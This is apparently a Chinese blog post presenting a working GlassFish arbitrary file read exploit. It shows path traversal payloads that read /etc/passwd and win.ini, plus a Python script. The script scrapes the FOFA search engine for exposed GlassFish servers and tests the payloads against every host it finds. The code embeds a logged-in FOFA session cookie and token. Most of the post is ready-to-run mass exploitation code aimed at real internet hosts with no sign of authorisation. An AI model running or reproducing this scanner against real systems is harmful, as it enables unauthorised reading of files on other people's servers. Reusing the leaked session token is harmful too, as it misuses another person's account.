1. 漏洞信息
(1)漏洞名称: 应用服务器 glassfish 任意文件读取
(2)漏洞 poc
payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
2. 编写思路
(1)实现功能 :批量验证是否存在 glassfish 任意文件读取漏洞
(2)实现思路
①筛选出存在 glassfish 的服务器 IP 具体实现:——>借助 fofa 搜索,搜索语法为"glassfish" && port="4848" && after="2022-01-01"——>通过爬虫爬取 fofa 搜索的全部结果的页面源代码——>通过 lxml 库提取爬取到的内容中的地址信息。
②批量验证存在 glassfish 的应用是否存在任意文件读取漏洞 两个 poc;分别对应 linux 和 windows 的 读取从 fofa 输出的结果,将漏洞 poc 中的地址进行替换,发起 get 请求,根据请求的响应状 态码来判断是否存在漏洞。
3.注意事项
①读取文件时 windows 和 Linux 下的文件是不同的
②爬虫爬取 fofa 的输出结果编码成 utf-8,看起来更容易
③爬取 fofa 后面的内容时,需要将登录的 cookie 信息放入请求头中
4、代码实现
import requests,base64,time,sys
from lxml import etree
def fofa_search(search,page):
##获取网页地址
##搜索:"glassfish" && port="4848" && after="2022-01-01"
cookie = 'Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1654563084; Hm_lvt_19b7bde5627f2f57f67dfb76eedcf989=1662218025,1662254360; befor_router=; fofa_token=eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MTg1MTUwLCJtaWQiOjEwMDEwNzAyMywidXNlcm5hbWUiOiLlraTpuL8iLCJleHAiOjE2NjI0NzcyMjF9.BfFLN-jX7_xe883XqplwiqqtqGLNzlEc_KRKEYUmolSE0AaJ5bova2--3mg1OzRhsjbLLpAQtKdIJztepADskA; user=%7B%22id%22%3A185150%2C%22mid%22%3A100107023%2C%22is_admin%22%3Af…umb%22%3A%22https%3A%2F%2Fi.nosec.org%2Favatar%2Fsystem%2Fusers%2Favatars%2F100%2F107%2F023%2Fthumb%2F1.jpg%3F1657938829%22%2C%22key%22%3A%22b2a3a51a8a8b76f70bc4bd3617f074b2%22%2C%22rank_name%22%3A%22%E6%B3%A8%E5%86%8C%E7%94%A8%E6%88%B7%22%2C%22rank_level%22%3A0%2C%22company_name%22%3A%22%E5%AD%A4%E9%B8%BF%22%2C%22coins%22%3A0%2C%22can_pay_coins%22%3A0%2C%22credits%22%3A1%2C%22expiration%22%3A%22-%22%2C%22login_at%22%3A1662218021%7D; baseShowChange=false; Hm_lpvt_19b7bde5627f2f57f67dfb76eedcf989=1662309662'
headers = {
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Host':'fofa.info',
'Accept-Encoding':'gzip, deflate, br',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Cache - Control':'no - cache',
'Connection':'keep - alive',
'Cookie':cookie.encode('utf-8'),
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0'
}
#search = '"glassfish" && port="4848" && after="2022-01-01"'
for page in range(1,page+1):
url = 'https://fofa.info/result?page_size=10&page='+str(page)+'&qbase64='
search_data = str(base64.b64encode(search.encode('utf-8')),'utf-8') ##加密后为字节型所以需要转换为字符串
urls = url+search_data
#print(urls)
print('正在提取第' + str(page) + '页数据')
try: ##防异常处理
result = requests.get(urls,headers=headers,timeout=0.5).text
#print(result) ##获取网页源码
##读取文本解析节点
html = etree.HTML(result) ##初始化生成一个Xpath解析对象
ip_data = html.xpath('//a[@target="_blank"]/@href')
#print(ip_data) ##提取ip地址
ipdata = '\n'.join(ip_data)
print(ipdata)
with open(r'url.txt','a+') as f:
f.write(ipdata+'\n')
f.close()
except Exception as e:
pass
##验证漏洞
def check_vuln():
payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
for ip in open('D:\\pycharm\\缓存\\爬虫\\url.txt'):
ip = ip.replace('\n','')
url_windows = ip+payload_windows
url_linux = ip+payload_linux
#print(url_windows)
#print(url_linux)
try:
result_windows = requests.get(ip+payload_windows).status_code #获取请求后返回的状态码
result_linux = requests.get(ip+payload_linux).status_code
print('正在验证:'+ip)
if result_windows == 200 or result_linux == 200:
with open(r'payload.txt','a+') as f:
f.write(ip+'\n')
f.close
time.sleep(0.5)
except Exception as e:
pass
if __name__ == '__main__':
search = sys.argv[1]
page = sys.argv[2]
fofa_search(search,int(page))
check_vuln()
5、结果验证
批量获取地址:
漏洞存在地址:
交互式:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
